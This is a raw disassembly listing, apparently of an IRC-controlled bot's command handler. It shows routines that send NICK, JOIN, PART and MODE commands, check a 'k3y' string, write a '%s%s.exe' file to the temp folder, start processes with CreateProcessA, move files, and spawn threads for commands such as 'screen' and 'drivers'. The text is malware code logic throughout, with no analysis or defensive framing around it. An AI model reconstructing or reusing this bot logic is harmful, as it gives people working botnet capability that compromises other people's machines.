push 20h ; Count
lea eax, [ebp+var_3AE4]
push [ebp+arg_8] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 3Ch
mov esi, [ebp+arg_4]
mov [ebp+var_3A64], eax
push [ebp+Src]
mov eax, [ebp+var_8]
mov [ebp+var_3A60], eax
lea eax, [ebp+Dst]
push [ebp+arg_18]
mov [ebp+var_3CEC], esi
push edi
push offset asc_443D18 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Dh ; int
push eax ; Source
call sub_40B78E
add esp, 20h
mov [ebp+var_3CE8], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3CEC]
push ebx
push eax
push offset sub_41350C
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_3CE8]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_408394
loc_40837E: ; CODE XREF: sub_401CC7+66CB�j
cmp [ebp+var_3A5C], ebx
jnz loc_4075C0
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_40837E
; ---------------------------------------------------------------------------
loc_408394: ; CODE XREF: sub_401CC7+66B5�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_443D48
jmp loc_4075B1
; ---------------------------------------------------------------------------
loc_4083A5: ; CODE XREF: sub_401CC7+4CCB�j
; sub_401CC7+4CE2�j
push 7Fh ; Count
lea eax, [ebp+var_1778]
push edi ; Source
push eax ; Dest
call _strncpy
push [ebp+arg_18] ; Str
call _atoi
push 3Fh ; Count
mov [ebp+var_1628], eax
push [ebp+Src] ; Source
lea eax, [ebp+var_16F8]
push eax ; Dest
call _strncpy
mov esi, [ebp+esi+var_80]
add esp, 1Ch
cmp esi, ebx
jz short loc_4083F0
push 3Fh ; Count
lea eax, [ebp+var_16B8]
push esi ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_4083F0: ; CODE XREF: sub_401CC7+6715�j
lea eax, [ebp+var_16F8]
mov [ebp+var_1624], 1
push eax
lea eax, [ebp+var_1778]
push [ebp+var_1628]
push eax
lea eax, [ebp+Dst]
push offset asc_443C88 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 1Fh ; int
push eax ; Source
call sub_40B78E
add esp, 20h
mov [ebp+var_1620], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_177C]
push ebx
push eax
push offset sub_4019E7
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_1620]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_40847C
loc_408466: ; CODE XREF: sub_401CC7+67B3�j
cmp [ebp+var_161C], ebx
jnz loc_407028
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_408466
; ---------------------------------------------------------------------------
loc_40847C: ; CODE XREF: sub_401CC7+679D�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset dword_443CB8
jmp loc_407019
; ---------------------------------------------------------------------------
loc_40848D: ; CODE XREF: sub_401CC7+4C8B�j
; sub_401CC7+4CA2�j
push [ebp+arg_18] ; Str
call _atoi
cmp eax, ebx
pop ecx
mov [ebp+var_1D64], eax
jle loc_408580
mov esi, 80h
push edi ; Format
lea eax, [ebp+var_1EEC]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
xor eax, eax
cmp [ebp+var_8EE], bl
push [ebp+Format] ; Format
setnz al
mov [ebp+var_1D60], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1EF0], eax
lea eax, [ebp+var_1DEC]
push esi ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_1D5C], eax
mov eax, [ebp+var_8]
push [ebp+arg_18]
mov [ebp+var_1D58], eax
lea eax, [ebp+Dst]
push edi
push offset asc_443BE0 ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+Dst]
push 15h ; int
push eax ; Source
call sub_40B78E
add esp, 20h
mov [ebp+var_1D6C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1EF0]
push ebx
push eax
push offset sub_413956
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_1D6C]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_40856F
loc_40855D: ; CODE XREF: sub_401CC7+68A6�j
cmp [ebp+var_1D54], ebx
jnz short loc_4085D7
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_40855D
; ---------------------------------------------------------------------------
loc_40856F: ; CODE XREF: sub_401CC7+6894�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_443C0C
jmp loc_404BEE
; ---------------------------------------------------------------------------
loc_408580: ; CODE XREF: sub_401CC7+67D7�j
push offset unk_443C44
jmp loc_40724C
; ---------------------------------------------------------------------------
loc_40858A: ; CODE XREF: sub_401CC7+4C5D�j
; sub_401CC7+4C74�j
push [ebp+arg_18]
push edi
call ds:dword_4F63BC ; MoveFileA
test eax, eax
jz short loc_4085B7
push [ebp+arg_18]
lea eax, [ebp+Dst]
push edi
push offset asc_443B9C ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp short loc_4085D7
; ---------------------------------------------------------------------------
loc_4085B7: ; CODE XREF: sub_401CC7+68CF�j
push offset dword_443BC0
call sub_418E9D
pop ecx
push eax ; Format
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
loc_4085D4: ; CODE XREF: sub_401CC7+2F33�j
; sub_401CC7+56BD�j
add esp, 0Ch
loc_4085D7: ; CODE XREF: sub_401CC7+20F6�j
; sub_401CC7+2ED5�j ...
cmp [ebp+var_8], ebx
jnz loc_408708
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
loc_4085F4: ; CODE XREF: sub_401CC7+5914�j
call sub_409D6C
add esp, 14h
jmp loc_408708
; ---------------------------------------------------------------------------
loc_408601: ; CODE XREF: sub_401CC7+4C2F�j
; sub_401CC7+4C46�j
push edi ; Format
lea eax, [ebp+var_3F04]
push 104h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
cmp [ebp+var_C], ebx
jz short loc_40863B
push [ebp+arg_18] ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40863B
push eax ; Format
lea eax, [ebp+var_3E00]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_40863B: ; CODE XREF: sub_401CC7+6952�j
; sub_401CC7+6963�j
push [ebp+Format] ; Format
lea eax, [ebp+var_3F84]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_3F88], eax
mov eax, [ebp+var_4]
mov [ebp+var_3CF8], eax
mov eax, [ebp+var_8]
mov [ebp+var_3CF4], eax
lea eax, [ebp+var_3E00]
push eax
lea eax, [ebp+var_3F04]
push eax
push offset asc_443B24 ; "-"
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+Dst]
push 24h ; int
push eax ; Source
call sub_40B78E
add esp, 20h
mov [ebp+var_3CFC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3F88]
push ebx
push eax
push offset sub_41785A
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_3CFC]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_4086ED
loc_4086DB: ; CODE XREF: sub_401CC7+6A24�j
cmp [ebp+var_3CF0], ebx
jnz short loc_408708
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_4086DB
; ---------------------------------------------------------------------------
loc_4086ED: ; CODE XREF: sub_401CC7+6A12�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset asc_443B54 ; "-"
loc_4086F9: ; CODE XREF: sub_401CC7+8F1�j
; sub_401CC7+A2F�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_408708: ; CODE XREF: sub_401CC7+7B6�j
; sub_401CC7+918�j ...
push 1
pop esi
jmp loc_40704C
; ---------------------------------------------------------------------------
loc_408710: ; CODE XREF: sub_401CC7+4C01�j
; sub_401CC7+4C18�j
push 44h
lea eax, [ebp+var_668]
pop esi
push esi ; Size
push ebx ; Val
push eax ; Dst
call _memset
push 1
mov [ebp+var_668], esi
pop esi
mov [ebp+var_638], bx
push edi ; Str
mov [ebp+var_63C], esi
call _atoi
add esp, 10h
cmp eax, esi
jnz short loc_40874D
mov [ebp+var_638], 5
loc_40874D: ; CODE XREF: sub_401CC7+6A7B�j
cmp [ebp+var_C], ebx
jz loc_407028
push [ebp+arg_18] ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz loc_407028
lea eax, [ebp+var_E10]
push eax
lea eax, [ebp+var_668]
push eax
push ebx
push ebx
push 28h
push esi
push ebx
push ebx
push edi
push ebx
call ds:dword_4F6374 ; CreateProcessA
test eax, eax
jnz short loc_408798
push offset unk_443AD4
jmp loc_40891F
; ---------------------------------------------------------------------------
loc_408798: ; CODE XREF: sub_401CC7+6AC5�j
push edi
push offset dword_443AF8
jmp loc_407019
; ---------------------------------------------------------------------------
loc_4087A3: ; CODE XREF: sub_401CC7+4BD3�j
; sub_401CC7+4BEA�j
push [ebp+arg_18] ; Str2
push offset aK3y ; "k3y"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40891A
lea eax, [ebp+var_48F0]
push eax
push 104h
call ds:dword_4F63B8 ; GetTempPathA
push 0FFh ; Count
lea eax, [ebp+var_25D0]
push edi ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+var_17D0]
push eax
call sub_40B16D
add esp, 10h
push eax
lea eax, [ebp+var_48F0]
push eax
lea eax, [ebp+var_24D0]
push offset aSS_exe ; "%s%s.exe"
push eax ; Dest
call _sprintf
mov eax, [ebp+esi+Str2]
add esp, 10h
cmp eax, ebx
mov [ebp+var_23CC], 1
mov [ebp+var_23C8], ebx
jz short loc_408838
push 10h ; Radix
push ebx ; EndPtr
push eax ; Str
call _strtoul
add esp, 0Ch
mov [ebp+var_23C0], eax
jmp short loc_40883E
; ---------------------------------------------------------------------------
loc_408838: ; CODE XREF: sub_401CC7+6B5B�j
mov [ebp+var_23C0], ebx
loc_40883E: ; CODE XREF: sub_401CC7+6B6F�j
mov esi, [ebp+esi+var_80]
cmp esi, ebx
jz short loc_408855
push esi ; Str
call _atoi
pop ecx
mov [ebp+var_23C4], eax
jmp short loc_40885B
; ---------------------------------------------------------------------------
loc_408855: ; CODE XREF: sub_401CC7+6B7D�j
mov [ebp+var_23C4], ebx
loc_40885B: ; CODE XREF: sub_401CC7+6B8C�j
movzx eax, [ebp+var_8FB]
mov esi, [ebp+arg_4]
push 7Fh ; Count
push [ebp+Format] ; Source
mov [ebp+var_23BC], eax
lea eax, [ebp+var_2650]
mov [ebp+var_2654], esi
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_23B4], eax
mov eax, [ebp+var_8]
mov [ebp+var_23B8], eax
push edi
lea eax, [ebp+Dst]
push offset asc_443A18 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dst]
push 1Eh ; int
push eax ; Source
call sub_40B78E
add esp, 18h
mov [ebp+var_23D0], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2654]
push ebx
push eax
push offset sub_416F9A
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_23D0]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_408909
loc_4088F3: ; CODE XREF: sub_401CC7+6C40�j
cmp [ebp+var_23B0], ebx
jnz loc_407028
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_4088F3
; ---------------------------------------------------------------------------
loc_408909: ; CODE XREF: sub_401CC7+6C2A�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset dword_443A44
jmp loc_407019
; ---------------------------------------------------------------------------
loc_40891A: ; CODE XREF: sub_401CC7+6AED�j
push offset asc_443A80 ; "-"
loc_40891F: ; CODE XREF: sub_401CC7+2E7C�j
; sub_401CC7+45F6�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_407028
; ---------------------------------------------------------------------------
loc_408932: ; CODE XREF: sub_401CC7+4BA5�j
; sub_401CC7+4BBC�j
push dword ptr [ebp+Args] ; Str2
push offset a332_0 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_402166
cmp [ebp+var_C], ebx
jz loc_402166
push [ebp+arg_18] ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
pop ecx
push eax
lea eax, [ebp+Dst]
push [ebp+Format]
push dword ptr [ebp+Args]
push [ebp+var_90]
push offset aSSSS ; "%s %s %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push 1FFh ; Count
push eax ; Source
push [ebp+Src] ; Dest
call _strncpy
push edi ; Str
call _atoi
add esp, 28h
test eax, eax
jle short loc_4089BB
push edi ; Str
call _atoi
imul eax, 3E8h
pop ecx
push eax
call ds:dword_4F6380 ; Sleep
loc_4089BB: ; CODE XREF: sub_401CC7+6CDE�j
push offset dword_4439EC
call sub_415C77
mov eax, [ebp+File]
pop ecx
inc eax
jmp loc_402169
; ---------------------------------------------------------------------------
loc_4089CF: ; CODE XREF: sub_401CC7+4B77�j
; sub_401CC7+4B8E�j
push dword ptr [ebp+Args] ; Str2
push offset a332_1 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_402166
cmp [ebp+var_C], ebx
jz loc_409B47
push [ebp+arg_18] ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
mov eax, [ebp+arg_18]
inc eax
push offset aRepeat_0 ; "repeat"
push eax ; Str1
call _strcmp
add esp, 10h
test eax, eax
push esi
jz short loc_408A8E
push [ebp+Format]
lea eax, [ebp+Dst]
push dword ptr [ebp+Args]
push [ebp+var_90]
push offset aSSSS_0 ; "%s %s %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push 1FFh ; Count
push eax ; Source
push [ebp+Src] ; Dest
call _strncpy
add esp, 24h
lea eax, [ebp+Dst]
push esi
push offset asc_443980 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax
call sub_415C77
push edi ; Str
call _atoi
add esp, 14h
test eax, eax
jle loc_409B47
push edi ; Str
call _atoi
add eax, [ebp+File]
pop ecx
jmp loc_402169
; ---------------------------------------------------------------------------
loc_408A8E: ; CODE XREF: sub_401CC7+6D4D�j
push offset asc_443998 ; "-"
loc_408A93: ; CODE XREF: sub_401CC7+76A5�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_408AA2: ; CODE XREF: sub_401CC7+762D�j
; sub_401CC7+777E�j
cmp [ebp+var_8], ebx
jnz short loc_408AC3
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 14h
loc_408AC3: ; CODE XREF: sub_401CC7+6DDE�j
; sub_401CC7+741D�j ...
lea eax, [ebp+Dst]
push eax
call sub_415C77
jmp loc_409B46
; ---------------------------------------------------------------------------
loc_408AD4: ; CODE XREF: sub_401CC7+4B49�j
; sub_401CC7+4B60�j
push 7Fh ; Count
lea eax, [ebp+var_2214]
push edi ; Source
push eax ; Dest
call _strncpy
push 7Fh ; Count
lea eax, [ebp+var_2194]
push [ebp+arg_18] ; Source
push eax ; Dest
call _strncpy
push 7Fh ; Count
lea eax, [ebp+var_2114]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
mov esi, [ebp+arg_4]
add esp, 24h
mov [ebp+var_2090], eax
mov eax, [ebp+var_8]
mov [ebp+var_2218], esi
push [ebp+arg_18]
mov [ebp+var_208C], eax
lea eax, [ebp+Dst]
push edi
push offset asc_4438E8 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Fh ; int
push eax ; Source
call sub_40B78E
add esp, 1Ch
mov [ebp+var_2094], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2218]
push ebx
push eax
push offset sub_414E84
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_2094]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_408B98
loc_408B82: ; CODE XREF: sub_401CC7+6ECF�j
cmp [ebp+var_2088], ebx
jnz loc_408C84
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_408B82
; ---------------------------------------------------------------------------
loc_408B98: ; CODE XREF: sub_401CC7+6EB9�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_44391C
jmp loc_408C75
; ---------------------------------------------------------------------------
loc_408BA9: ; CODE XREF: sub_401CC7+4B1B�j
; sub_401CC7+4B32�j
push 7Fh ; Count
lea eax, [ebp+var_23A8]
push edi ; Source
push eax ; Dest
call _strncpy
push 7Fh ; Count
lea eax, [ebp+var_2328]
push [ebp+arg_18] ; Source
push eax ; Dest
call _strncpy
push 7Fh ; Count
lea eax, [ebp+var_22A8]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
mov esi, [ebp+arg_4]
add esp, 24h
mov [ebp+var_2224], eax
mov eax, [ebp+var_8]
mov [ebp+var_23AC], esi
push [ebp+arg_18]
mov [ebp+var_2220], eax
lea eax, [ebp+Dst]
push edi
push offset asc_443874 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 11h ; int
push eax ; Source
call sub_40B78E
add esp, 1Ch
mov [ebp+var_2228], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_23AC]
push ebx
push eax
push offset sub_414630
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_2228]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_408C69
loc_408C57: ; CODE XREF: sub_401CC7+6FA0�j
cmp [ebp+var_221C], ebx
jnz short loc_408C84
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_408C57
; ---------------------------------------------------------------------------
loc_408C69: ; CODE XREF: sub_401CC7+6F8E�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset asc_4438A0 ; "-"
loc_408C75: ; CODE XREF: sub_401CC7+6EDD�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_408C84: ; CODE XREF: sub_401CC7+6EC1�j
; sub_401CC7+6F96�j
cmp [ebp+var_8], ebx
jnz loc_4041D2
push ebx
lea eax, [ebp+Dst]
push [ebp+var_4]
push eax
push [ebp+Format]
push esi
jmp loc_4041CA
; ---------------------------------------------------------------------------
loc_408CA4: ; CODE XREF: sub_401CC7+4AED�j
; sub_401CC7+4B04�j
push [ebp+arg_18]
lea eax, [ebp+Dst]
push offset aPartS_0 ; "PART %s"
push eax ; Dest
call _sprintf
push edi ; Str
call _atoi
add esp, 10h
test eax, eax
jle loc_409B47
push edi ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409B47
lea eax, [ebp+Dst]
push eax ; Args
push offset aS_14 ; "%s\r\n"
loc_408CE7: ; CODE XREF: sub_401CC7+7087�j
; sub_401CC7+7BA4�j
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_457134[eax] ; int
call sub_409D26
jmp loc_404B36
; ---------------------------------------------------------------------------
loc_408D04: ; CODE XREF: sub_401CC7+4ABF�j
; sub_401CC7+4AD6�j
push [ebp+esi+Str2]
lea eax, [ebp+Dst]
push [ebp+arg_18]
push offset aJoinSS_1 ; "JOIN %s %s"
push eax ; Dest
call _sprintf
push edi ; Str
call _atoi
add esp, 14h
test eax, eax
jle loc_409B47
push edi ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409B47
lea eax, [ebp+Dst]
push eax
push offset aS_15 ; "%s\r\n"
jmp short loc_408CE7
; ---------------------------------------------------------------------------
loc_408D50: ; CODE XREF: sub_401CC7+4A91�j
; sub_401CC7+4AA8�j
push [ebp+arg_18]
lea eax, [ebp+Dst]
push offset aNickS_5 ; "NICK %s"
push eax ; Dest
call _sprintf
push edi ; Str
call _atoi
add esp, 10h
test eax, eax
jle loc_409B47
push edi ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409B47
lea eax, [ebp+Dst]
push eax ; Args
push offset aS_16 ; "%s\r\n"
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_457134[eax] ; int
call sub_409D26
add esp, 0Ch
push [ebp+arg_18]
push edi ; Args
push offset dword_443810 ; Format
loc_408DB7: ; CODE XREF: sub_401CC7+717A�j
; sub_401CC7+71E8�j ...
call sub_415CEB
jmp loc_404B36
; ---------------------------------------------------------------------------
loc_408DC1: ; CODE XREF: sub_401CC7+4A63�j
; sub_401CC7+4A7A�j
cmp [ebp+var_C], ebx
jz loc_409B47
push [ebp+arg_18] ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_408DF2
push esi
lea eax, [ebp+Dst]
push offset aModeS ; "MODE %s"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_408DF2: ; CODE XREF: sub_401CC7+7114�j
push edi ; Str
call _atoi
test eax, eax
pop ecx
jle loc_409B47
push edi ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409B47
lea eax, [ebp+Dst]
push eax ; Args
push offset aS_17 ; "%s\r\n"
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_457134[eax] ; int
call sub_409D26
add esp, 0Ch
push esi
push edi
push offset dword_4437D8
jmp loc_408DB7
; ---------------------------------------------------------------------------
loc_408E46: ; CODE XREF: sub_401CC7+4A35�j
; sub_401CC7+4A4C�j
cmp [ebp+var_C], ebx
jz loc_409B47
push [ebp+arg_18] ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409B47
push edi ; Str
call _atoi
test eax, eax
pop ecx
jle loc_409B47
push edi ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409B47
push esi ; Args
push offset aS_18 ; "%s\r\n"
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_457134[eax] ; int
call sub_409D26
add esp, 0Ch
push esi
push edi
push offset dword_4437A0
jmp loc_408DB7
; ---------------------------------------------------------------------------
loc_408EB4: ; CODE XREF: sub_401CC7+4A07�j
; sub_401CC7+4A1E�j
cmp [ebp+var_C], ebx
jz loc_409B47
push edi ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409B47
push esi ; Args
push offset aModeS_0 ; "MODE %s\r\n"
push [ebp+arg_4] ; int
call sub_409D26
add esp, 0Ch
push esi
push offset unk_443770
jmp loc_409B40
; ---------------------------------------------------------------------------
loc_408EEE: ; CODE XREF: sub_401CC7+49D9�j
; sub_401CC7+49F0�j
push dword ptr [ebp+Args] ; Str2
push offset a332_2 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_402166
push [ebp+arg_18] ; Args
push offset aPartS_1 ; "PART %s\r\n"
push [ebp+arg_4] ; int
call sub_409D26
push edi ; Str
call _atoi
imul eax, 3E8h
add esp, 10h
push eax
call ds:dword_4F6380 ; Sleep
push [ebp+esi+Str2]
push [ebp+arg_18] ; Args
push offset aJoinSS_2 ; "JOIN %s %s\r\n"
push [ebp+arg_4] ; int
call sub_409D26
push offset dword_443744
call sub_415C77
jmp loc_4036D3
; ---------------------------------------------------------------------------
loc_408F54: ; CODE XREF: sub_401CC7+49AB�j
; sub_401CC7+49C2�j
cmp [ebp+var_C], ebx
jz loc_409B47
push edi ; Str
call _strlen
push [ebp+arg_8] ; Str
mov esi, eax
call _strlen
add eax, [ebp+var_C]
push [ebp+arg_18] ; SubStr
lea eax, [eax+esi+2]
push eax ; Str
call _strstr
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_409B47
push esi
lea eax, [ebp+Dst]
push offset dword_4436F0 ; Format
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push ebx ; int
push eax ; int
push edi ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 20h
push esi
push edi
push offset unk_4436FC
jmp loc_408DB7
; ---------------------------------------------------------------------------
loc_408FBD: ; CODE XREF: sub_401CC7+497D�j
; sub_401CC7+4994�j
cmp [ebp+var_C], ebx
jz loc_409B47
push edi ; Str
call _strlen
push [ebp+arg_8] ; Str
mov esi, eax
call _strlen
add eax, [ebp+var_C]
push [ebp+arg_18] ; SubStr
lea eax, [eax+esi+2]
push eax ; Str
call _strstr
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_409B47
push ebx ; int
push ebx ; int
push esi ; int
push edi ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 14h
push esi
push edi
push offset unk_4436C4
jmp loc_408DB7
; ---------------------------------------------------------------------------
loc_40900E: ; CODE XREF: sub_401CC7+494F�j
; sub_401CC7+4966�j
cmp [ebp+var_C], ebx
jz loc_402166
push [ebp+arg_18] ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz loc_402166
push eax ; int
push edi ; Str2
call sub_415B7F
pop ecx
pop ecx
push edi
push offset unk_443698
jmp loc_407669
; ---------------------------------------------------------------------------
loc_409040: ; CODE XREF: sub_401CC7+4921�j
; sub_401CC7+4938�j
push [ebp+arg_18] ; int
push edi ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_4192B6
loc_409055: ; CODE XREF: sub_401CC7+2624�j
add esp, 14h
jmp loc_402166
; ---------------------------------------------------------------------------
loc_40905D: ; CODE XREF: sub_401CC7+48E1�j
; sub_401CC7+48F8�j
push edi ; SubStr
push [ebp+arg_1C] ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz loc_409B47
mov esi, [ebp+esi+Format]
cmp esi, ebx
jz loc_409101
push esi ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_4090E9
push esi
lea eax, [ebp+Dst]
push [ebp+Format]
push dword ptr [ebp+Args]
push [ebp+var_90]
push offset aSSSS_1 ; "%s %s %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push 1FFh ; Count
push eax ; Source
push [ebp+Src] ; Dest
call _strncpy
add esp, 24h
lea eax, [ebp+Dst]
push esi
push edi
push offset asc_443608 ; "-"
push eax ; Dest
call _sprintf
add esp, 10h
inc [ebp+File]
jmp loc_408AC3
; ---------------------------------------------------------------------------
loc_4090E9: ; CODE XREF: sub_401CC7+73C7�j
lea eax, [ebp+Dst]
push offset asc_443630 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_408AC3
; ---------------------------------------------------------------------------
loc_409101: ; CODE XREF: sub_401CC7+73B2�j
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_41BC18
add esp, 0Ch
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 14h
lea eax, [ebp+Dst]
push edi
push offset asc_443660 ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
jmp loc_408AC3
; ---------------------------------------------------------------------------
loc_40914B: ; CODE XREF: sub_401CC7+48B3�j
; sub_401CC7+48CA�j
push offset aScreen ; "screen"
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4091AE
cmp [ebp+esi+Format], ebx
jz short loc_40919B
push [ebp+esi+Format]
call sub_415F56
cmp eax, 1
pop ecx
jnz short loc_409194
push [ebp+esi+Format]
lea eax, [ebp+Dst]
push offset asc_4433A8 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_4091AE
; ---------------------------------------------------------------------------
loc_409194: ; CODE XREF: sub_401CC7+74AE�j
push offset unk_4433D4
jmp short loc_4091A0
; ---------------------------------------------------------------------------
loc_40919B: ; CODE XREF: sub_401CC7+749C�j
push offset asc_443404 ; "-"
loc_4091A0: ; CODE XREF: sub_401CC7+74D2�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_4091AE: ; CODE XREF: sub_401CC7+7493�j
; sub_401CC7+74CB�j
push offset aDrivers ; "drivers"
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_409245
mov [ebp+Source], ebx
loc_4091C6: ; CODE XREF: sub_401CC7+7569�j
lea eax, [ebp+var_53F8]
push 1FFh
push eax
lea eax, [ebp+var_4EF0]
push 0FFh
push eax
push [ebp+Source]
call dword_4E4250
test eax, eax
jz short loc_409229
lea eax, [ebp+var_53F8]
push eax
lea eax, [ebp+var_4EF0]
push eax
lea eax, [ebp+var_5D88]
push [ebp+Source]
push offset asc_443448 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+var_5D88]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
